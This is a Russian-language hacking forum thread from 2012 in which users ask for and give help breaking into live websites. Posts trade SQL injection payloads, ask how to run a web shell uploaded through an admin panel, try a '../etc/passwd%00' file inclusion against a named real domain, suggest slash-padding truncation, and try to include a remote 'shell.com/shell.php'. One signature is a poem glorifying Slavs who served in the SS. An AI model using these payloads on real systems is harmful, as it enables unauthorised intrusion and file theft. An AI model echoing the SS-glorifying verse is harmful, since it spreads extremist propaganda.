HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1973 из 2422 « Первая < 9731473187319231963 1969 1970 1971 1972 1973 1974 1975 1976 1977 198320232073 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2012, 22:33
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию
Цитата:
Сообщение от Fooog  
Так точно. Но при:
1'+order+by+1+--
Выдает:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1
А при:
1'/**/order/**/by/**/1/**/--
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1
+GROUP+BY+1+--
Также не помогает.
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.03.2012, 22:41
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
Всем добрый вечер. Суть такова - через админку заливаю шелл. Расширение .php без проблем пропускается, но при обращению к этому скрипту вылетает 500 ошибка. Далее пытался залить в эту же директорию .htaccess, чтобы попробовать порулить Апачем в пределах этой директории, но беда в том, что скрипт дописывает к началу любого загружаемого файла определенные символы, и получается что-то типа x_1.htaccess.

Что можно придумать?
 
Ответить с цитированием

  #3  
Старый 14.03.2012, 22:48
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию
Цитата:
Сообщение от aydin-ka  
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
тоже нет.

not found!

Так же указано. Бага формата не ?id=1, a id/1'

При запросе ?id=1 страница та, но ошибка отсутствует.
 
Ответить с цитированием

  #4  
Старый 14.03.2012, 22:53
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию
Цитата:
Сообщение от Fooog  
тоже нет.
not found!
Так же указано. Бага формата не ?id=1, a id/1'
При запросе ?id=1 страница та, но ошибка отсутствует.
Попробуй так id/1?id=1'

P.S: лучшее ссылку в ПМ...
 
Ответить с цитированием

  #5  
Старый 14.03.2012, 22:57
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию
Цитата:
Сообщение от aydin-ka  
Попробуй так id/1?id=1'
P.S: лучшее ссылку в ПМ...
Ошибку не выводит. Отправил в ПМ...
 
Ответить с цитированием

  #6  
Старый 14.03.2012, 23:26
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
народ а тут, нужно отсеять окончание, нул байт не помогает

http://proeveryday.ru/index.php?id=../etc/passwd%00

тут читал /thread98525.html но нифига неполучилось, мб недопонял

подскажите как правильно
 
Ответить с цитированием

  #7  
Старый 15.03.2012, 01:39
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
 
Ответить с цитированием

  #8  
Старый 15.03.2012, 02:38
Spunoff
Познающий
Регистрация: 16.01.2012
Сообщений: 40
С нами: 7538006

Репутация: 0
По умолчанию
site.com/page.php=about.php выдаёт about.php на сервере

site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте

Можно как-то залить шелл на site.com?
 
Ответить с цитированием

  #9  
Старый 15.03.2012, 02:40
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию
скинь ссылку в ЛС,тут же нет экстрасенсов
 
Ответить с цитированием

  #10  
Старый 15.03.2012, 02:43
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию
Цитата:
Сообщение от Spunoff  
site.com/page.php=about.php выдаёт about.php на сервере
site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте
Можно как-то залить шелл на site.com?
скорее всего это просто ифрейм а не инклуд
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием
Ответ
Страница 1973 из 2422 « Первая < 9731473187319231963 1969 1970 1971 1972 1973 1974 1975 1976 1977 198320232073 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.